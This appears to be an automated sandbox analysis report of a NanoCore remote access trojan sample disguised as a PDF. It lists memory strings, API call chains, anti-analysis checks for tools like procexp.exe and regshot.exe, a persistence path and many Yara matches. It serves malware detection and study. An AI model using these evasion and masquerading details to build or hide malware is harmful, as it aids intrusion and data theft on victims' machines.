      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: delay
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mutexc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mshta.exese
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600c1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c717\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591g
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execute_vbsb
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _msgbox
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c22ff4bc756a603ab4a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kernel32.dll
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k3ysx
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tla&t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s_start
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @0xct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @7xdt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @phct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @m8ct
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wxct
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA3312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00BA3312
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0EBE5 mouse_event,6_2_00C0EBE5
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C013F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_00C013F2
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006CB1000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerg
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000031BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: ihgsvw.exeBinary or memory string: Shell_TrayWnd
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000030D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@K
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager\2+
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk
      Source: ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inGetText("Program Manager") = "0" Then
      Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager\
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_003EAF0F
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF654 cpuid 0_2_003EF654
      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_003EDF1E
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BFE5F8 GetUserNameW,6_2_00BFE5F8
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DB146 GetVersionExW,0_2_003DB146
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
      Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

      Stealing of Sensitive Information

      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara match; File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Source: ihgsvw.exe; Binary or memory string: WIN_81
      Source: ihgsvw.exe; Binary or memory string: WIN_XP
      Source: ihgsvw.exe; Binary or memory string: WIN_XPe
      Source: ihgsvw.exe; Binary or memory string: WIN_VISTA
      Source: ihgsvw.exe; Binary or memory string: WIN_7
      Source: ihgsvw.exe; Binary or memory string: WIN_8

      Remote Access Functionality

      Source: ihgsvw.exe, 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
